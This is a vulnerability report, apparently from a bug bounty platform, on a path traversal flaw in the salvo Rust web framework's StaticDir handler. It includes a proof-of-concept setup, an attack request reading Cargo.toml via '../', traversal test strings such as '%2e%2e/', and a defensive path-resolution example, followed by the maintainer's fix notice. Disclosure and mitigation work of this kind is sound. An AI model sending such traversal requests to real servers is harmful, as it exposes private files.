Relative Path Traversal vulnerability in StaticDir server in salvo-rs/salvo
Valid
Reported on Apr 17th 2022
Description
There is a relative path traversal vulnerability in the `serve` module of the `extra` crate (the `StaticDir` handler). The handler joins the requested path onto the configured root without rejecting `..` components, so an attacker can simply request a relative path such as `../Cargo.toml` and read files outside of the configured directory root.
Proof of Concept
With a `static` folder in the project directory:
```rust
// main.rs
use salvo::extra::serve::{Options, StaticDir};
use salvo::prelude::*;

#[tokio::main]
async fn main() {
    // Catch-all route: everything after "/" is handed to StaticDir as the
    // requested file path, rooted at ./static.
    let router = Router::with_path("<**path>")
        .get(StaticDir::width_options(vec!["static"], Options::default()));
    Server::new(TcpListener::bind("0.0.0.0:7878"))
        .serve(router)
        .await;
}
```
Example attack request:
```http
GET /../Cargo.toml HTTP/1.1
Host: localhost
```
This serves the `Cargo.toml` file in the project directory, which is outside the `static` directory.
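The request above works because the handler resolves `static/../Cargo.toml` and lets the operating system walk up out of the root. The following is an added example, not salvo's code and not the fix the maintainer shipped: it contrasts a naive join with a two-stage check (a lexical pass that rejects `..` and Windows prefixes on the percent-decoded path, then an on-disk canonicalization that also catches symlinks pointing outside the root). The function names `percent_decode`, `naive_resolve`, `safe_resolve` and `open_under_root` are hypothetical.

```rust
// Added example (not salvo's code): resolving a request path under a
// static root without letting ".." escape it.
use std::fs;
use std::path::{Component, Path, PathBuf};

/// Decode %XX escapes. A real framework does this before routing; the
/// traversal check must run on the decoded path, otherwise "%2e%2e/"
/// slips past a check that only looks for a literal "..".
fn percent_decode(s: &str) -> Option<String> {
    let bytes = s.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' {
            let hex = bytes.get(i + 1..i + 3)?;
            out.push(u8::from_str_radix(std::str::from_utf8(hex).ok()?, 16).ok()?);
            i += 3;
        } else {
            out.push(bytes[i]);
            i += 1;
        }
    }
    String::from_utf8(out).ok()
}

/// Naive resolution as a vulnerable handler does it: join the raw request
/// path onto the root. "/../Cargo.toml" becomes "static/../Cargo.toml",
/// which the OS happily resolves to the parent directory.
fn naive_resolve(root: &Path, request_path: &str) -> PathBuf {
    root.join(request_path.trim_start_matches('/'))
}

/// Lexical check: rebuild the path from Normal components only. Any
/// ParentDir ("..") or Windows drive prefix rejects the whole request.
fn safe_resolve(root: &Path, request_path: &str) -> Option<PathBuf> {
    let decoded = percent_decode(request_path)?;
    if decoded.contains('\0') {
        return None;
    }
    let mut out = root.to_path_buf();
    for comp in Path::new(&decoded).components() {
        match comp {
            Component::Normal(part) => {
                // On Unix a backslash is an ordinary byte, but if the same
                // handler is ever run on Windows it becomes a separator.
                if part.to_str()?.contains('\\') {
                    return None;
                }
                out.push(part);
            }
            // Leading "/" or "./" carry no information under a fixed root.
            Component::RootDir | Component::CurDir => {}
            Component::ParentDir | Component::Prefix(_) => return None,
        }
    }
    Some(out)
}

/// Second line of defence: canonicalize on disk (this follows symlinks)
/// and confirm the result still lies under the canonical root.
fn open_under_root(root: &Path, request_path: &str) -> Option<PathBuf> {
    let candidate = safe_resolve(root, request_path)?;
    let real_root = fs::canonicalize(root).ok()?;
    let real = fs::canonicalize(&candidate).ok()?;
    if real.starts_with(&real_root) {
        Some(real)
    } else {
        None
    }
}

fn main() {
    let root = Path::new("static");
    for req in ["/index.html", "/../Cargo.toml", "/%2e%2e/Cargo.toml", "/..%5cCargo.toml"] {
        println!(
            "{req:<22} naive={:?} safe={:?}",
            naive_resolve(root, req),
            safe_resolve(root, req)
        );
    }
}
```

The lexical pass alone is enough to stop the report's request, but it cannot see a symlink inside `static` that points at `/etc`; that is what the canonicalize step is for, at the cost of one extra syscall per request.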
Impact
This vulnerability allows an unauthenticated attacker to read any file on the server that the Salvo process has permission to read, not only files under the configured static directory.
We are processing your report and will contact the salvo-rs/salvo team within 24 hours. (a year ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md. (a year ago)
We have contacted a member of the salvo-rs/salvo team and are waiting to hear back. (a year ago)
A salvo-rs/salvo maintainer commented (a year ago):
Thanks for your work, I have published a new version to fix this issue.
The fix bounty has been dropped
This vulnerability will not receive a CVE